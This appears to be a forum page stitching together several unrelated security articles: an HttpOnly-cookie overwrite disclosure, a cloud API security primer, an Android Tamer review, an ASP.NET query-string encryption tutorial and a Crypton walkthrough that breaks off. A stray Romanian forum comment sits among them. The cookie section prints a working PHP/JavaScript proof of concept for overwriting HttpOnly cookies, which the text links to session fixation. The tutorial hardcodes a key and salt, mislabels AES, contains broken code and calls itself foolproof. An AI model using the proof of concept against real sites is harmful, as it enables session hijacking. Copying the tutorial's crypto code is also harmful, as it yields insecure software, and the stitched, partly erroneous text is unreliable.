Opera Mobile and Opera Mini. They decided to fix the issue in Opera Mini (date of fixing has not been determined). Although Opera Mobile was available on Google Play at the time of submission, Opera Software considered it to be legacy and didn’t decide to fix it (they responded that the replacement is Opera for Android, which prevents JavaScript from overwriting HttpOnly cookie). BlackBerry responded that PlayBook tablet OS (I used this one while testing) has been announced as out of support as of April 2014 and the issue will not be fixed. However, the issue was reported before the OS end of support was announced and they decided to put me on Acknowledgements 2014 list of BlackBerry Security Incident Response Team (due to their policy my name will be put there by the end of April 2014) [2]. The issue was confirmed in Konqueror, but probably it will not be fixed. The conversation about this bug is available in KDE Bugtracking System [3]. The issue was reported to Apple two months ago, and since then I haven’t received any feedback from them. 5. Playing with the issue Here is the simple piece of code: <? setcookie('cookie1',++$_COOKIE['cookie1'],time()+2592000,'/','',0,1); setcookie('cookie2',++$_COOKIE['cookie2'],time()+2592000,'/','',0,0); ?> <HTML> <? print "Cookie1: ".$_COOKIE['cookie1']."<br>"; print "Cookie2: ".$_COOKIE['cookie2']; ?> <script>alert(document.cookie);</script> <script>document.cookie='cookie1=100; expires=Thu, 2 Aug 2014 20:00:00 UTC; path=/';</script> </HTML> The procedure is as follows – run it and then see that cookie1 (which has set HttpOnly flag) has been overwritten by JavaScript. 6. Summary HttpOnly flag was introduced to prevent JavaScript from reading a cookie with HttpOnly flag. It turns out, however, that a cookie with HttpOnly flag can be overwritten by JavaScript in some browsers, what can be used by the attacker to launch session fixation attack. It was presented, which browsers allow JavaScript to overwrite HttpOnly cookie together with response from vendors. Finally, a simple piece of code was demonstrated to play with this issue. References: [1] Understanding Session Fixation Understanding Session Fixation - InfoSec Institute [2] Acknowledgements 2014 – BlackBerry Security Incident Response Team BlackBerry Enterprise – BlackBerry Products & Services - Canada [3] KDE Bugtracking System – Bypassing HttpOnly cookie in Konqueror https://bugs.kde.org/show_bug.cgi?id=330751 Source
-
Introduction In the last couple of years there has been a boom in cloud computing, but mainly just the term is new, as we’ve been using cloud services for years without even realizing it. Almost every cloud, whereas it’s Saas, PaaS or IaaS, implements some kind of API (Application Programming Interface), which can be used by developers to interact with the service programmatically. APIs can be used for a number of things, like pulling data out of the database, sending data to be stored in the database, pushing jobs to a queue, etc. OpenStack is a cloud computing system that uses a dashboard to manage every component of the system that further uses APIs to do its thing. Let’s take a look at the picture below taken from [1] that presents the basic overview of the components used in OpenStack, which are connected via the APIs. Cloud APIs are basically programing interfaces embedded into the cloud system, which a programmer uses to instruct the cloud into performing some action. When a cloud service provides an API, it means we have all the advantages of an API available, so we can automate many tasks we would normally have to do by hand: imagine that we have to apply some action to all our virtual machines running in the cloud – if there are just a few virtual machines, it wouldn’t be a problem to just click the button, which performs the action we would like to execute. But what if there are thousands of virtual machines, or if there isn’t a single button to perform the needed action, but we have to press multiple buttons and switch between panes to do it? In such situations, it would be very painful to do this by hand, so API comes to the rescue, enabling us to automate most of the stuff. Methodologies Before going any further with this article, we need to explain that when planning an API, we have to think about the overall picture. Whenever we send a message over a communication channel, we’re using some kind of protocol or a set of rules that must be known both to the sender as well as the recipient to be able to process the message correctly. Whenever we’re concerned about securing the API, we need to send and receive messages over a secure network connection: we might use a secure HTTPS connection rather than an insecure HTTP one; and it’s not limited only to HTTP and HTTPS, but we might be sending data over other protocols as well: POP(S), IMAP(S), SMTP(S), LDAP(S), XMPP(S), etc. Remember to use the secure version of the protocol (with the letter ‘S’ in its name) when we want to encrypt the data we’re sending out on the Internet: only the sender and recipient should be able to read the message in cleartext. The other thing is data representation or format: it doesn’t really matter how the message is structured or formatted as long as both endpoints understand it. Usually, the APIs are exchanging messages in XML or JSON format, or possibly both are supported, which gives users more flexibility when interacting with the application. Whichever format we’re using to exchange data between the two endpoints, we must properly secure them against possible attack vectors. When dealing with an API where the communication is done over HTTP(S), we need to check and test the application for known web application injection flaws, like CSRT, XSS, SQL injection, schema validation, etc. Most types of APIs are the following: REST (Representational State Transfer): REST is an architecture, not a protocol, built upon HTTP protocol, where URI requests are used to reference resources by using GET, POST, PUT and DELETE HTTP methods. An important concept to grasp is the following: requests need to be authorized based on resource content and not URLs, because when we change the application, the URLs will change as well, and all of a sudden our security policy is not valid anymore: URLs play a minor part in the application, and we shouldn’t build security on them. Every security feature we would like to have in REST has to be manually developed, since none of it is built-in. Usually REST API is simpler to learn, which is why many developers are using it to build their own API to extend their application. SOAP (Simple Object Access Protocol): is a protocol defining the exchange of structured data over the network [4]. Usually it uses HTTP(S) for message transmission and XML for data representation or message format. If HTTP(S) is used, it uses GET for reading and POST for writing data. There’s also a WS-Security, which is an extension to SOAP and provides guidelines for solving the following security problems [5]: identify and authentication of a client, ensure integrity of the message, and prevent eavesdropping of messages in transit. XML-RPC: uses XML based messaging format and HTTP communication protocol. JSON-RPC: uses JSON based messaging format and HTTP communication protocol. Identification Techniques When developing a brand new application programming interface, we need to address the following issues: Identity: when starting to interact with a server that doesn’t initially know who we are, we must prove our identity; we need to provide the answer to the question, “Who are you?” Usually, we must provide a user ID or a public key, which uniquely identifies us; note that the provided information is public, so anybody can identify as us, but he won’t be able to prove it. Authentication: here we have to prove that we are who we say we are by answering the question, “Can you prove you are who you say you are?” The server will send us a challenge, to which we must respond with something that’s known only to us, let it be a password, a private key, a token, etc. Authorization: when we’ve proven our identify, we can request access from the application we’re interacting with. At that time, the application needs to check whether we’re allowed to access the requested resource. Below we can see a number of techniques an application can use to identify and authenticate users. Username/Password: we’re sending username and password to the endpoint application to identify and authenticate ourselves. An example is basic authentication, where we connect to the server, which responds with a WWW-Authenticate HTTP header, which contains a scheme the server wants us to authenticate against. Whenever servers sends us a WWW-Authenticate HTTP header, they want us to authenticate, and we have to respond with the Authorization HTTP header with the username/password key-pair being base64 encoded. Since the base64 encoded string can be easily decoded to get its plain text, if basic authentication is used, the communication must be encrypted. Sessions: at first we send a username and password to the application to get back a cookie, which is sent in all subsequent requests to establish an authentication session. Certificates: an application might use public/private PKI infrastructure to authenticate users, which requires a valid server and client certificates that are signed by a valid certificate authority, which can prove the validity of the certificate. OAuth: has gained a lot of popularity over the years and is mainly used when an application uses another application on behalf of the user. If we’re writing an application that implements the share button to Facebook or Twitter, we’re most probably using OAuth authentication, which grants the application access to the Facebook/Twitter data without revealing the password of the application itself. Therefore, the application doesn’t need to provide username/passwod authentication, but OAuth only. Custom Authentication Scheme: we can use custom authentication scheme to identify, authenticate and authorize users using whatever we prefer and customize it all the way down to the core: we should only do so if we really know what we’re doing. API Key: when API keys are in used, the identity and authenticity can be proven directly in the first request sent to the server without prior authentication with a username/password or a private key – this can have a minor advantage of saving some bandwidth, but isn’t really crucial, since Internet connections are really fast nowadays. An API key is a simply a very long, unique token that’s known only to the application running on the server-side as well as the client sending an API request. The items below present why API keys are superior to some other authentication schemes we outlined previously. Entropy: when auto-generating the API key, which is a long ID, the entropy is significantly larger when compared to username/password, which usually has between 5-15 characters, while the API key has a much larger entropy space because of larger string as well as characters being randomly selected. Thus, the API key has a significant increase in the randomness, which makes it harder to bruteforce and therefore more secure. Password Change: when we change the password through the web interface, because we’ve forgotten it or we simply want to be compliant with some security policy and change it every so often, the clients that use the API need to be reconfigured to support the password change. If API key is used, the password can be changed regardless of the API key, which remains the same. Speed: usernames and passwords are usually stored in a form of MD5/SHA1 hashes in the backend database. When the user authenticates with them to the application, a hash is calculated and compared to the value stored in the database. If the hashes match, access is granted, otherwise it’s not. MD5/SHA1 hashes have known collision attacks, which lowers their security, but there are other methods to attack a hash: rainbow tables, powerful specialized hardware components, advanced software algorithms, cloud cracking farms, etc. Such attacks are not really relevant when API keys are involved, because API keys are just strings that are compared upon each request. Since API keys are normally quite long, they can’t be bruteforced in real-time, which eliminates the attack vector considerably. Also consequentially just a string, which is known by the server application as well as the client, can be bruteforced easily. Note that usernames and passwords can be just as difficult to crack if proper slower algorithms like Blowfish, Bcrypt or SHA512 are used. Why slower algorithms, shouldn’t we strive towards faster algorithms and web applications? In this case no; when using a slower algorithm to compute a hash of some kind, it means that when an attacker is bruteforcing the hash, it will also slow his attack considerably, which is a good thing to prevent hackers from cracking our hashes in realtime. Exposure: when we generate an API key, we immediately download it from the web page and save it into a file on our filesystem, but it isn’t so with passwords, which are not handled with so little fuss. Traceability: with API keys, we always know which request was issued by which client, because of the used unique API. This isn’t so with usernames and passwords, which are often shared among many users and sent in emails in cleartext – because of that they can also be stolen by the attackers easily. After the development of the API, we have to properly test it. Since API is most often built on HTTP(S) there are also standard web application threats lurking in the background. Each of the chosen techniques outlined in this article also has its share of vulnerabilities we must be careful enough to not overlook. OWASP association provides many documents that outline the vulnerabilities in chosen architecture like [6], but there are so many possible vulnerabilities existing in an API that it’s better if a professional penetration tester or security consultant checks the application/code for vulnerabilities. We should also do a penetration test on a regular basis to minimize the number of bugs still residing in our code. In the end, it all depends on how the code is written, but we have a standard principle of never trusting the users data that still applies. To build a safer API, we might even apply SDLC (Secure Development Life Cycle) into the development process. Conclusion When choosing a cloud service provider, we’ll most likely be using its API sooner or later to automate actions. When choosing the CSP, one of the things to check for is the proper documentation and security of its API. If the CSP has good documentation of its API, that’s the first good sign that something is right, but otherwise it might be the opposite. In addition to that, CSPs need to allow each customer to hire a penetration tester to test its API, or they have to hire a security consultant or penetration tester themselves. When developing our own API, we must take same security precautions and make sure the API is thoroughly tested for security bugs. References: [1] OpenStack: The Open Source Cloud Operating System, https://www.openstack.org/software/. [2] Do you need API keys? API Identity vs. Authorization, https://blog.apigee.com/detail/do_you_need_api_keys_api_identity_vs._authorization/. [3] It’s Me, and Here’s My Proof: Why Identity and Authentication Must Remain Distinct, http://technet.microsoft.com/en-us/library/cc512578.aspx. [4] SOAP, https://en.wikipedia.org/wiki/SOAP. [5] Securing Your API, Jason Austin, Securing Your API. [6] REST Security Cheat Sheet, https://www.owasp.org/index.php/REST_Security_Cheat_Sheet. Source
-
Are you a Backtrack/Kali freak? Ever thought of having a similar distribution in your arsenal dedicated for Android Security? “Android Tamer” is the solution to fulfill your needs. What is Android Tamer? Android Tamer is a Linux based distribution developed for Android Security Professionals. This distribution is based on Ubuntu 10.04LTS, which includes various popular tools available for Android Development, Penetration Testing, Malware Analysis, ROM Analysis and Modification, Android Forensics, etc. This article walks you through various tools available in “Android Tamer” and how they fulfill our real life Android Security needs. Prerequisites Machine with Virtual Box installed RAM: 512Mb (minimum) Bringing it UP We can download the latest version of Android Tamer from its official website here (Android Tamer). Currently there are two versions available. After downloading, extract the zip file, which gives a VMDK file which can be opened with virtual machines like VMware Workstation or VirtualBox. It is suggested to use this VMDK file in virtual box rather than VMware since it is optimized for Virtual Box. To know more about VMDK files, please visit here. (VMDK - Wikipedia, the free encyclopedia). Now, open up Virtual Box and create a new virtual machine instance and boot the VMDK file to start running “Android Tamer”. It greets us with a brand new window which needs a username and password to login. The default username:password is tamer:android. Description of Available Tools “Android Tamer” has several popular tools preinstalled, with the following as its main sections. ROM Modding Reverse Engineering Pen Testing Malware Analysis Forensics Development Vulnerable Lab Tools Rooting Let’s now explore each section and see the existing tool set and how they can be useful. Reverse Engineering This section contains the most popular Android Reverse Engineering tools which include dex2jar, JD-GUI, APKTOOL, etc. APK Analyser is another important tool available in the Reverse Engineering Section. APK Analyser is a powerful framework which allows us to disassemble byte codes, analyze application architecture, perform byte code injections in Android Apps, and the list goes on. This is one of the best tools available to analyze Android apps and comes preinstalled with Android Tamer. Malware Analysis This is one of the finest sections, which includes some great automated tools for Android Malware Analysis. DroidBox is one among them. We can simply go and use DroidBox from its command line by navigating to the directory /Arsenal/Droidbox. In general you may find it difficult to set up DroidBox in your local machine as it has some dependencies to be installed to run the tool. Android Tamer sets everything ready for you. AndroGuard is another great set of Python tools preinstalled for malware analysis. This is one of the best tools I have seen on the Internet for Android Malware Analysis. After its release, there were a lot of other tools built based on AndroGuard. You can go ahead and see the documentation available at their official link (https://code.google.com/p/androguard/). Pen Testing Pen Testing is the right place for you if you are looking for a strong set of tools to audit the security of your Android apps or smartphone. This contains tools required to audit both “browser based apps” and “native apps”. Tools for testing browser based apps include BurpSuite, w3af, Firefox with all the required plugins, OWASP ZAP, etc. It comes preinstalled with Mercury Framework, which is one of the best ones available for auditing Android Apps. It basically looks for vulnerabilities in IPC end points of an application. Android Tamer also contains Smart Phone Pentest Framework by Bulb Security. Smart Phone Pentest Framework has a Metasploit kind of functionality to audit the security of your smartphone. Development The Development section is one my favorite sections which allows you to write your POC apps during your pen test. Let’s assume you have identified a content provider leakage vulnerability in an application and want to write a malicious app as a Proof of Concept to exploit the identified vulnerability. Tools available in the development section come in handy to fulfill your needs. It is not recommend for users to use this section for fulltime development, as it eats a lot of memory and the system goes slow. Eclipse + ADT: Android Tamer contains Eclipse IDE integrated with ADT bundle which enables us to write Android Apps. DDMS: Dalvik Debug Monitor Service is an excellent solution to do things such as interacting with the file system, controlling the emulator, pulling and pushing files from/to the device or emulator, debugging applications, etc. Android NDK: Android Native Development Kit enables us to write low level applications in C/C++. Forensics Android Tamer consists of some preinstalled digital forensic tools. AFLogical Open Source Edition: AFLogical is another popular logical data extraction tool made for the Android Platform. It pulls all available MMS, SMS, Contacts, and Call Logs from an Android device and presents the data to the examiner. Sleuthkit is another command line tool integrated to perform in depth analysis of file systems. This tool also has a Graphical User Interface version named AutoSpy. Rooting and ROM Modding If during your pen test or forensics / device assessment you come across a device which is non rooted and you need to root in order to get gain more insight, then the default installation also comes packaged with Android version specific rootkits such as Gingerbreak, ZergRush, psnneuter, etc. At times it might be required to check for or modify existing ROM’s or analyze content on existing ROM backup. In such scenarios, DSIXDA Kitchen is provided, which adds ROM modding capabilities to the system. In order to flash these customized packages back into the device, we need flashing utilities like fastboot, Flashtools, heimadal, etc as flashing tools. It is also combined with some common tools like QT-ADB, which acts as a filemanager kind of utility for devices utilizing the ADB interface. Final Words If you are looking for a framework for your all your Android security needs, Android Tamer could be one of the best tools that you can look into. Source
-
Eu nu inteleg ce rost are postul, doar i se da importanta unui nimic. @Kronzy serios nu trebuia sa postezi si sa ii faci pe plac, probabil acum isi freaca bostanele de fericire ca e subiect de discutii...
-
This paper especially pinpoints the poor practice of cryptography in URL, which is typically implemented to encrypt sensitive data residing in the website URL in the form of a query string that is transmitted across a variety of networks. Websites can be compromised and such subtle information (query string) can be disclosed by exploiting this vulnerability. This article demonstrates a real-time scenario in which developers commit mistakes by practicing weak cryptographic methods inadvertently. Finally, this article addresses the various disadvantages of applying weak cryptography algorithm and suggests a variety of alternative methods to secure URL data properly. Introduction Securing URL is the process of concealing or encrypting a parameterized query string-based URL such as www.xyz.com/login.aspx?uid=ajay&pawd=09876 by applying complex C#.NET cryptography. The moment a URL is requested from the server, internally we determine the required parameters, then encrypt the query string values where sensitive information is typically located, redirect them to another source for further processing, and then decrypt the encrypted query string values there, if necessary. In this whole process, the URL always shows some bizarre values in the query string that are safe from the malicious hacker’s eyes because it is very hard for him to figure out what exactly is travelling across the network via the query string. The idea of query string encryption protects a web page from MITM or session hijacking attacks to some extent. This mechanism is somewhat similar to URL rewriting, where a verbose URL is flashing in the address in spite of the actual web page address where the query string parameters are located. The hacker never ever anticipates that the requested URL would have contained any query string values. Susceptible URL The following Asp.Net page, which simply authenticates users by checking for a correct user id and password, is created to demonstrate the real concept behind disclosing “sensitive data via URL” incident. This page stipulates both facilities for logging in; plain text or secure sign-in. Though it is optional, we are showing user credential information on the redirected Welcome.aspx page, but there is a catch in the address bar, also. There is a possibility that a malicious hacker could intercept the traffic and he can easily take advantage of user information, as such data are travelling or located in the query string in clear text. Hence, this is the crucial vulnerability that we are going to pinpoint in this paper. Securing Sensitive Data This section describes the process of encrypting the data residing in a query string. The login form interface is designed in such a way that, if the user enables the Secure Sign-in check box, the encryption algorithm will be activated behind the scene and it is hard to anticipate what ciphered data will travel across the web pages in the query string. As the user moves ahead by enabling the “Secure Sign-in” option, the following piece of code is activated and encrypted as the sensitive portion of URL. Here, the Encrypt() method takes the user name and password from the login form and implements ciphering. Later, the user will be redirected to the welcome page via query string mechanism: string usr = HttpUtility.UrlEncode(Encrypt(txtUser.Text.Trim())); string pwd = HttpUtility.UrlEncode(Encrypt(txtPwd.Text.Trim())); Response.Redirect(string.Format("~/welcome.aspx?usrname={0}&password={1}", *********************************usr, pwd)); Developers usually protect the query string by invoking the UrlEncode method, which typically converts the plain text into base64 format. But such encoding does not suffice and is still vulnerable. Hence, we applied double protection here in the form of invoking a custom algorithm and the UrlEncode method. Query String Encryption In this code segment, the real encryption of query string parameters will be happen in the Encrypt() method implementation, which is called when the user clicks on the “Sign-In” button. The query string values will first be encrypted using the AES Symmetric key algorithm and will then be sent to the welcome page, where the query string values will be first deciphered and then decrypted using the AES Algorithm again using the symmetric key that was used for encryption earlier on the login page. As we know, the hashing algorithm can be implemented by either a symmetric key or an asymmetric key. In asymmetric key cryptography, two keys are employed for encryption and decryption, but in this tutorial we are relying on a symmetric key, in which a single key is used for both ciphering and deciphering the sensitive data. Generating Secure Key (Symmetric) The symmetric key could be anything, depending on the developer’s discretion. Symmetric key algorithms are very effective for processing extensive amounts of data and are less intensivecomputationally than asymmetric encryption algorithms. Hence, we hardcoded the symmetric key as “ajaykumar007,” which perform both functions as following; string password = "ajaykumar007"; It is recommended that the symmetric key be strong, with many alphanumeric keys, so it is hard to guess. A simple combination of words is always considered to be a weak key and susceptible to dictionary attacks. There are plenty of methods for generating a secure key, such as the following code for generating a symmetric key: static String CreateKey(int numBytes) { RNGCryptoServiceProvider rnd = new RNGCryptoServiceProvider(); byte[] b = new byte[numBytes]; rnd.GetBytes(; return BytesToHexString(; } static String BytesToHexString(byte[] bytes) { StringBuilder hexString = new StringBuilder(64); for (int counter = 0; counter < bytes.Length; counter++) { hexString.Append(String.Format("{0:X2}", bytes[counter])); } return hexString.ToString(); } We can also use the aforesaid code for generating an asymmetric key programmatically, but we move ahead with “ajaykumar007.” Generating Salt Salt is typically random data that is used as supplementary input to a one-way function that hashes a passphrase or sensitive data. The salt and the password are concatenated and processed with a cryptographic hash function and the resulting output (but not the original password) is stored with the salt in a database. The key purpose of salts is to protect against pre-computed rainbow table and dictionary attacks. It is not mandatory to keep the salt value a secret. An attacker never ever assumes in advance what the salt will be, so they can’t use a rainbow table or a pre-computed lookup table, because the salt value is generated randomly and thehash’s value would be different each time. Generally, we create salt random values by employing the code shown below: private static string CreateSalt(int size) { //Generate a cryptic random number. RNGCryptoServiceProvider rnd = new RNGCryptoServiceProvider(); byte[] b = new byte[size]; rnd.GetBytes(; // Return a Base64 string representation of the random number. return Convert.ToBase64String(; } Although the aforesaid code could best fit in while generating a raw salt value, it is a bit complicated. Hence, we can generate random salt values by using an ASCII converter, too. The salt value can be anything, as we explained earlier. So just put any value in the plain-text box, for example, “keyencrypt” and convert it into hexadecimal format. We have generated the salt value that will be merged with secret to encrypt the plain text, as shown below: As we can observe from the figure above, the salt value is in hex form; now prefix “0X” to each hex byte, place them into a sequence, and assign this value to an array of byte data type, which will referenced in the Rfc2898DeriveBytes later with the secret key. Just remember one thing: The salt value must be same during both encryption and decryption. byte[] salt = new byte[] { 0x6B, 0x65, 0x79, 0x65, 0x6E, 0x63, 0x72, 0x79, 0x70, 0x74 }; Hashing Algorithm We shall encrypt the query string parameters by employing the AES (advanced encryption standard) algorithm, which is a variant of Rijandael algorithm and which, of course, provide strong security and performance. AES reduces the number of parameters you have to configure and allows you to work at a very high level of abstraction. The AES algorithm is a symmetric-key block cipher that can use keys of 128, 192, and 256 bits; it encrypts and decrypts data in blocks of 128 bits. The following image shows the entire life cycle of encrypting the query string and decrypting at the receiving site: Okay, we now have all the ingredients for hashing: a query string, secret key, and salt value. In the Encrypt() method, the key derivation method Rfc2898DeriveBytes in AES implementation repeatedly hashes the password along with the salt, padding, and block size configuration. string password = "ajaykumar007"; .. using (Aes encryptor = Aes.Create()) { byte[] salt = new byte[] { 0x6B, 0x65, 0x79, 0x65, 0x6E, 0x63, 0x72, 0x79, 0x70, 0x74 }; Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, salt); .. encryptor.Key = pdb.GetBytes(32); encryptor.IV = pdb.GetBytes(16); .. } Testing Everything has been place in the Encrypt() method so far. Now run the project, enter some login information, and enable the “Secure Sign-in” check box. The user will be redirected to Welcome.aspx page, but notice the query string parameter value. It is encrypted and totally foolproof against hacking. For our convenience, we are also displaying the query string value (login data) over the welcome.aspx as shown below: Query String Decryption As you have seen in the previous figure, the query string is also being displayed over the page in encrypted form and that form also provides the facility to decrypt these ciphered values. This section showcases such a mechanism by the Decrypt() method, which would be called when the user clicks the Decrypt button. Here, we need two things: the key that is used to encrypt the query string parameters and the salt. Both of these must not be tampered with or decryption won’t be happen. private string Decrypt(string cipherText) { string password = "ajaykumar007"; byte[] cipherBytes = Convert.FromBase64String(cipherText); using (Aes encryptor = Aes.Create()) { byte[] salt = new byte[] { 0x6B, 0x65, 0x79, 0x65, 0x6E, 0x63, 0x72, 0x79, 0x70, 0x74 }; Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, salt); encryptor.Key = pdb.GetBytes(32); encryptor.IV = pdb.GetBytes(16); using (MemoryStream ms = new MemoryStream()) { .. } } .. } This time, click the Decrypt button and the web page will display the deciphered value that is entered over the login form and passed through the query string, as shown below: Vulnerability and Redemption This paper has demonstrated the generation of a persistent asymmetric key using the AES algorithm to encrypt and decrypt sensitive URL data. However, although the data in the query string are successfully encoded, this approach is still vulnerable to the Replay attack, MITM attack, and brute-force attack. Sensitive credentials are still passing in clear text form even if they are encrypted via the AES algorithm. A smart hacker can easily hack the user name and password via session hijacking, since HTTPS is not applied. The real problem here is that the user name and password are still being transmitted in plain text at least once to the server and then the encrypted strings are being passed back to the client. Those strings can be picked up off the wire and used in a replay attack. Here, the following methods should be used to fix the aforesaid problem in this article for redemption: HTTPS—We shall have to install a digital certificate on the server in order to protect the communication traffic between client and server. POST Method—Data that travels across the server via a query string using the GET method is always venerable to sniffing or hijacking. Hence, it is a good idea to use the POST method rather than GET method in such a scenario. Secure Session Management—It is suggested that proper, secure session management should be used in order to foil man-in-the-middle and session hijacking attacks. Encryption of XML Data—Data resided in XML file is always in clear text form, so it is not recommended to store crucial data in XML files. Final Word In this article, we have pinpointed the vulnerability in the query string parameter while encoding them by practicing weak cryptography methods where the data travels across the network in clear text and is susceptible to MITM attack. We have showcased the scenario and glitches that are often created by programmers or developers during the encryption and decryption of sensitive URL data using symmetric key encryption through the use of AES algorithm. Finally, we have seen the actual problem of applying weak cryptography methods as well as redemption methods. Source
-
1. Introduction to the Problem Crypton is an open-source project provided by SpiderOak with the purpose of solving privacy and security problems through cloud applications. Before introducing the solution, we must first talk about the problem. The main problem with cloud-based applications is that the user’s data is stored in the cloud and therefore can be accessed and read by anyone having access to the server—namely the cloud service provider (CSP). Not to mention that, if an attacker was able to penetrate the CSP’s defenses, he might also be able to access the client’s data. That being said, Crypton is a framework that can be used for building cryptographically secure cloud applications, which means that the client’s data is securely stored in the cloud in encrypted form—only the client possesses the knowledge to decrypt its data. Crypton does all the cryptography behind the scenes, so developers don’t have to bother with it. If everybody is trying to use their own cryptographic methods to provide zero-knowledge cloud-based applications, there would definitely be discrepancies, probably some more vulnerable than others, but none would fit the profile perfectly. 2. Presenting the Solution With Crypton, we can build secure cloud-based applications where all the encryption and decryption of the client’s data is done on the client side of the communication, before the data is actually sent to the cloud. This results in encrypted data being stored on the cloud. Depending on how we programmed the applications, all of the data we stored in the cloud could be encrypted. Of course, it’s not always necessary to encrypt everything, because sometimes it may be more efficient to work with unencrypted data. This is because some of the data isn’t so important that it needs to be encrypted and, by not encrypting it, we’re saving a few CPU cycles, which would normally need to be spent by the encryption and decryption process. There are also other server-side optimizations that can be done on unencrypted data that can’t be done on encrypted data, such as searching through the data itself. If we would like to do a simple search over the encrypted data in the cloud, all the data must be sent to the client, where it’s decrypted, after which the search algorithm can do its job. But that results in whole database that needs to be sent over a network consuming bandwidth before a single search through the data can be done. Note that the Crypton documentation states that Crypton is not yet ready for the production environment [1], but hopefully we’ll spread the word around the Internet to attract more developers who are willing to test and possibly contribute to it. 3. Crypton Diary Overview Let’s now take a look at the Crypton Diary example application, which was written with security in mind. The Diary application uses Crypton to encrypt the user’s data and is accessible at https://diary.crypton.io/, which is presented on the picture below. We can see that there is an input form where we can enter our username and password. There’s also a login button, which logs us into the application, and a register button, which allows a new account to be registered. Let’s first create a new account by inputting crypton:crypton into the username and password input fields. When pressing the register button, the cryptographic keys will automatically be created and we’ll be logged into the application. In the picture below, we can see the Diary application once we’ve logged-in. There is an input box where we can input some text about our life. To save the message, we can press the “Save” button and, to delete the message, we need to press the “Delete” button. The menu contains two buttons: “Entries,” which lists all the saved message entries, and “Create,” which creates a new message entry. Let’s input a new message, “Hello, this is my first entry.” and save it. Once the message has been saved, we can see it if we click on the “Entries” menu button, which will present entries based on when we’ve saved them. There is currently just one message, which was saved 1 minute ago. Let’s now create a second entry with the text: “Now I’ve gotten used to the Diary application and I’m wondering whether my messages are encrypted when saved to the cloud?” as shown below: Now there are two messages presented if we enter the “Entries” menu again: This is the basic usage of the application. If you’ve followed the article, you can see that we’re already wondering whether the messages are being stored in encrypted form. This is a valid and important question that we’re trying to address in this article. Just from using the web application normally, we don’t know the answer to that question, because we haven’t programmed the application ourselves: For all we know, the messages might also be stored in clear-text. There is a simple check that we can use to confirm whether the messages are secure: We can start an intercepting proxy, catch the messages being sent to the server, and see for ourselves. If we start Wireshark, we won’t get any meaningful results, because the messages are transmitted over HTTPS, which uses an encrypted layer. Rather than trying to figure out how to see HTTPS decrypted messages in Wireshark, let’s start the Burp intercepting proxy and see the messages in clear-text. The picture below presents a request being sent to the server once we save a Diary message: Notice that we’re dealing with a POST request going to https://diary.crypton.io/transaction/1528. The request body contains a JSON message, which describes a single transaction with the following fields: type, containerNameHmac, and payloadCiphertext. The payloadCiphertext contains the encrypted version of our payload, which confirms that encrypted version of the text is being stored on the cloud. Of course there are ways in which the application can still read the cipher-text of our encrypted text. When we registered, the application could store our password in clear-text and use it to decrypt our messages. In the remainder of the article we’ll try to find out whether this is true or not, so bear with me here. 4. Getting Crypton To get Crypton, we must first install all the dependencies mentioned in [1]; basically we need to install the git revision control system, the postgresql database, and the node.js JavaScript library. After all dependencies have been successfully installed, we can clone the Crypton repository from the SpiderOak Github profile and build it with make. Note that Crypton uses the following Node.JS libraries, because we need to be aware of them when developing a cryptographically secure application with Crypton: Karma—a tool that allows us to execute JavaScript in web browsers. Mocha—a simple JavaScript test framework. Mockery—This allows a simple and easy-to-use API that we can use to hook mocks. Should. Uglify—A JavaScript parser and beautifier library. Bcrypt—An implementation of BCrypt encryption algorithm. Commander—This provides a command-line interface. Redis—A client to connect to Redis NoSQL database. Cors—A library for enabling cross-origin resource sharing in web applications. Express—A web application framework. Node-UUID—This generates universally unique identifiers. Sinon—A test framework. Colors—This provides colors in the console. Connect—A HTTP server framework. Cookie—For cookie management. Cryptojs—This provides various secure cryptographic algorithms. Lusca—this provides application security for Express. PG—A PostgreSQL client. Socket.IO—This provides web socket API for real-time applications. We must also install Redis server version > 2.6, which we can do with the commands below. I’m specifically mentioning those commands, because otherwise you’ll end up with an older version of Redis.\ # sudo apt-get install -y python-software-properties # sudo add-apt-repository -y ppa:rwky/redis # sudo apt-get update # sudo apt-get install -y redis-server Prior to cloning and installing the Crypton repository, you should also download the latest version of Node.JS and install it. We won’t go into the steps now, since they are properly documented on the [1] website. Finally, we should clone the Crypton repository from Github and enter the created directory. # git clone -b sharing https://github.com/SpiderOak/crypton/ crypton # cd crypton/ Once we’re in the Crypton directory, we must first run the “check_dependencies.sh” script, which verifies that every dependency has been properly installed. After that, we can simply run make, which should read the Makefile in the directory and execute the commands written in it. Basically, Makefile runs the make command in the client/, server/ and integration_tests/ directories, which contain Makefiles. Note that I hadn’t been able to successfully build Crypton by running make in its base directory. I had to enter server/ and client/ directories and manually run the make command in each of them. In the server directory, we also have to run the “sudo npm link” command to create proper system symbolic links that so the crypton executable is in PATH and can be executed from anywhere. On an Ubuntu system. the /usr/local/bin/crypton symlink is created. In the client directory, we also have to execute the make command – if you receive the following error, it means that karma cannot be found. # make cat src/core.js src/account.js src/session.js src/container.js src/transaction.js src/peer.js src/message.js src/diff.js src/vendor/*.js > dist/crypton.js make: ./node_modules/.bin/karma: Command not found make: *** [test-unit] Error 127 To solve the error we need to install karma manually with npm install and link to its binary executable with the commands below. # cd client/ # npm install karma # cd node_modules/.bin/ # ln -sf ../karma/bin/karma . # cd - # make In this article, we’ll present a Diary example, for which we need to enter the client/examples/diary/ directory and start Crypton. Because Crypton will start a web server listening on privileged port 443, we need to invoke it with sudo privileges. Below, we can see that the HTTPS server was successfully started and is listening on port 443: # sudo crypton [info] loading config [info] config file not specified, using example [info] loading datastore [debug] listening for container updates [info] configuring server connect.limit() will be removed in connect 3.0 connect.multipart() will be removed in connect 3.0 visit https://github.com/senchalabs/connect/wiki/Connect-3.0 for alternatives connect.limit() will be removed in connect 3.0 [info] loading routes [info] starting HTTPS server [info] HTTPS server listening on port 443 [info] starting socket.io info - socket.io started After that, we can visit the webpage, where the Crypton Diary application is now running. We can see that below: Crypton Diary Internals In the previous section, we saw how to get Crypton and how to run the Crypton Diary application. Now we’ll take a look at what happens behind the curtains to see how the information is being stored on the server side. Let’s first see how the Redis database is used. We can connect to the database with the redis-cli command and then enter arbitrary Redis commands. We can execute “keys *” to display all keys currently stored in the database. Prior to actually connecting to Diary Crypton with our web browser, there will be no keys stored in the Redis database, as can be seen below: # redis-cli 127.0.0.1:6379> keys * (empty list or set) After we enter the Crypton Diary web address in a web browser and connect to the website, a new key for our session is created. Our session key below is “crypton.sid:to3U1feDnhB5tr1kwXhXxQVq”. The first mget command displays the value of our session key before we have authenticated to the Diary application and the second mget command displays the value of session key after successful authentication. Notice that when we have authenticated to the web application, 